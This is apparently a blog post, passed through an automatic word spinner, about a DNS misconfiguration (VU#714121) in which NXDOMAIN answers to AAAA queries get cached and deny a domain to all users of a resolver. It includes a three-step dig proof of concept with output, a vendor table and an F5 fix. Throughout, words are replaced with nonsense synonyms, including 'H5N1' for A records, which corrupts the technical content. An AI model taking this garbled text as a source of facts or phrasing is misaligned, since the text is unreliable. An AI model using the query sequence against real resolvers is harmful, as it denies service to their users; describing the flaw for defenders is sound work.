This is an odd province of affairs together with a misconfiguration on DNS servers that tin laissez passer the axe endure exploited using a uncomplicated AAAA DNS query. This causes a localized Denial-of-service province of affairs where users behind a specific resolver volition get:
Error:
Unable to produce upward one's heed IP address from host mention www.somevulnerablesite.com
The DNS server returned: Name Error: The domain mention does non exist.
This way that the cache was non able to resolve the hostname presented inward the URL.
Check of the address is correct.
Your cache administrator is root.
Before yous read this article, yous should read virtually AAAA records IPv6 addresses inward the Domain Name System. Following department is taken direct from Vulnerability Note VU#714121
Overview
Some DNS servers respond amongst an inappropriate fault message if queried for nonexistent AAAA records, which tin laissez passer the axe atomic number 82 to possible denial of service.
Description
Some DNS servers respond amongst a “Name Error” response code (NXDOMAIN, RCODE 3) instead of “No Error” (RCODE 0) when queried for a nonexistent AAAA record. (AAAA records are used to supply name-to-address resolution for IPv6 addresses, every bit described inward RFC1886.)
When an NXDOMAIN response code is received, the querying resolver volition unremarkably halt attempting to resolve that name. Resolvers that back upward negative caching (RFC2308) together with have an NXDOMAIN response volition non enquiry for H5N1 records for the same resources until the negatively cached fault response has expired.
Sites operating DNS servers that respond to queries for nonexistent AAAA records amongst NXDOMAIN response codes may endure susceptible to attackers using other sites’ caching nameservers to block those other sites’ users from resolving records inward domains served past times the broken DNS servers. Similar attacks may endure possible against caching resolvers if an assaulter were able to produce the resolver to await upward a nonexistent AAAA tape from a server acting inward this manner.
Note: The same resultant occurs amongst A6 records. However, A6 records (RFC2874) have got been deemed “Experimental” past times the IETF, amongst preference beingness given to AAAA records (RFC3363, RFC3364).
This is non a novel issue. The NXDOMAIN inward response to a AAAA enquiry resultant was noted inward the (now expired) Internet Draft
draft-itojun-jinmei-ipv6-issues-00.txt:
There are broken DNS servers that render NXDOMAIN against AAAA queries, when it should render NOERROR amongst empty render records. When deploying IPv6/v4 dual stack node, it becomes employment because dual stack nodes would enquiry AAAA first, reckon NXDOMAIN error, together with won’t bear witness to enquiry H5N1 records. These broken DNS servers need to endure corrected.
However, nosotros have got non seen this resultant documented elsewhere every bit a potential denial-of-service laid on vector against sites amongst their DNS servers broken inward this manner.
Impact
An assaulter could produce a localized denial-of-service status past times exploiting this vulnerability.
Solution
Apply a spell from your vendor.
Systems Affected
Usually BIND 8.2 or afterwards versions are non affected. However, reckon below:
| Vendor | Status | Date Notified | Date Updated |
|---|---|---|---|
| Cisco Systems Inc. | Affected | 21 Mar 2003 | 23 May 2003 |
| F5 Networks | Not | 21 Mar 2003 | 23 May 2003 |
| djbdns | Unknown | 21 Mar 2003 | 21 Mar 2003 |
| ISC | Unknown | 21 Mar 2003 | 21 Mar 2003 |
| Microsoft Corporation | Unknown | 21 Mar 2003 | 21 Mar 2003 |
| Openwall GNU/*/Linux | Unknown | 21 Mar 2003 | 21 Mar 2003 |
Reproducing NXDOMAIN responses using AAAA queries
This is a proof of concept. Outputs are modified to conceal identities.
Step 1: Check touchstone H5N1 tape response
Doing a uncomplicated DIG asking to resolv2.technoused.blogspot.com for www.somevulnerablesite.com
Got a response amongst AUTHORITY: 2.
[user@blackmoreops-resolver2 ]# dig www.somevulnerablesite.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 150580
;; flags: ar bd ca; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;www.somevulnerablesite.com. IN A
;; ANSWER SECTION:
www.somevulnerablesite.com. thirty IN H5N1 100.100.100.100
;; AUTHORITY SECTION:
somesite.srd.com. 2705 IN NS loadbalancer1.xyz.com.
somesite.srd.com. 2705 IN NS loadbalancer2.xyz.com.
;; ADDITIONAL SECTION:
loadbalancer1.xyz.com. eighteen IN H5N1 200.200.200.200
loadbalancer2.xyz.com. 191 IN H5N1 200.200.200.201
;; Query time: 23 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: quarta-feira January three 23:04:51 2014
;; MSG SIZE rcvd: 150
Step 2: Request AAAA response
Doing a uncomplicated DIG AAAA asking for www.somevulnerablesite.com. Got a NXDOMAIN response with AUTHORITY: 1.
Also authorities annotation that the AUTORITY changed together with nosotros are missing DNS glue. (Additional Section)
Note: This is where it goes wrong, every bit We only received a NXDOMAIN response from an AUTHORITATIVE server.
This NXDOMAIN is similar a shot cached for twenty minutes.
[user@blackmoreops-resolver2 ]# dig AAAA www.somevulnerablesite.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 24603
;; flags: ar bd ca; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.somevulnerablesite.com. IN AAAA
;; AUTHORITY SECTION:
somesite.srd.com. 1200 IN SOA loadbalancer2.xyz.com. hostmaster.removedaddress.com. 2014031841 3600 900 2207600 1200
;; Query time: 23 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: quarta-feira Jan three 23:05:02 2014
;; MSG SIZE rcvd: 120
Step 3: Any subsequent DIG requests volition laissez passer NXDOMAIN responses
Doing a Simple DIG asking for www.somevulnerablesite.com
Got a NXDOMAIN response amongst AUTHORITY: 1.
This happens because an NXDOMAIN takes preferences for both ipv4 together with ipv6. (also it’s similar a shot cached)
[user@blackmoreops-resolver2 ]# dig www.somevulnerablesite.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 24179
;; flags: ar bd ca; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.somevulnerablesite.com. IN A
;; AUTHORITY SECTION:
somesite.srd.com. 1196 IN SOA loadbalancer2.xyz.com. hostmaster.removedaddress.com. 2014031841 3600 900 2207600 1200
;; Query time: 0 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: quarta-feira January three 23:05:02 2014
;; MSG SIZE rcvd: 120
In this item case, it was a mis-configured F5 GTM (Global Traffic Manager) together with the solution was forwarded to the the Network Admin of the vulnerable site.
F5 Solution
http://support.f5.com/kb/en-us/solutions/public/7000/800/sol7851.html
However, fifty-fifty though F5’s tin laissez passer the axe endure synced, yous need to configure each F5 (F5 v9 together with F5 v10 comes inward pair, starting v11, yous tin laissez passer the axe have got to a greater extent than than two) WIP IPv6 NoError response manually every bit that purpose of config is non inward the shared directory (i.e. /config).
Conclusion
This is a really uncomplicated Denial-of-service laid on together with extremely tough to observe every bit DNS is the final house a Network admin would look. This touching Cisco Systems, F5 GTM’s, djbdns, ISC, Microsoft DNS together with Openwall GNU/*/Linux DNS servers. In most cases this is caused when the same DNS server is used for a long fourth dimension together with ipv6 is non taken into account. New installation of DNS servers unremarkably encounters it pretty good together with inward instance of a AAAA request, it volition post a NOERROR response.
Interestingly, Google seems to endure invulnerable to NXDOMAIN caching together with responses, I am non certain if Google uses dig +trace to produce upward one's heed a DNS response or if they are breaking RFC past times non respecting a NXDOMAIN response from an Authoritative server. Either way, if you’re using Google DNS resolvers, you’re safe. But secured resolvers unremarkably caches a NXDOMAIN responses for 10-20 minutes together with past times sending this AAAA request, yous tin laissez passer the axe brand a domain unavailable for all users behind that resolver.
Also know that all the vendors fixed this resultant (at to the lowest degree the ones using BIND 8.2 or later), but yous larn those few older version inward the wild sometimes.
Useful resources
- Vulnerability Note VU#714121 – Incorrect NXDOMAIN responses from AAAA queries could displace denial-of-service conditions
- Cisco Systems Inc. Information for VU#714121 – Incorrect NXDOMAIN responses from AAAA queries could displace denial-of-service conditions
- F5 Networks Information for VU#714121 Incorrect NXDOMAIN responses from AAAA queries could displace denial-of-service conditions
- sol7851: Configuring the BIG-IP GTM or Link Controller systems to supply NOERROR responses for IPv6 queries
- ISC BIND AAAA denial of service (DNS_Bind_AAAA_RPZ_DoS)
- ISC BIND DNS64 Nameserver Response Policy Zone AAAA Record Query Remapping Remote DoS Vulnerability
- DNS Best Practices, Network Protections, together with Attack Identification
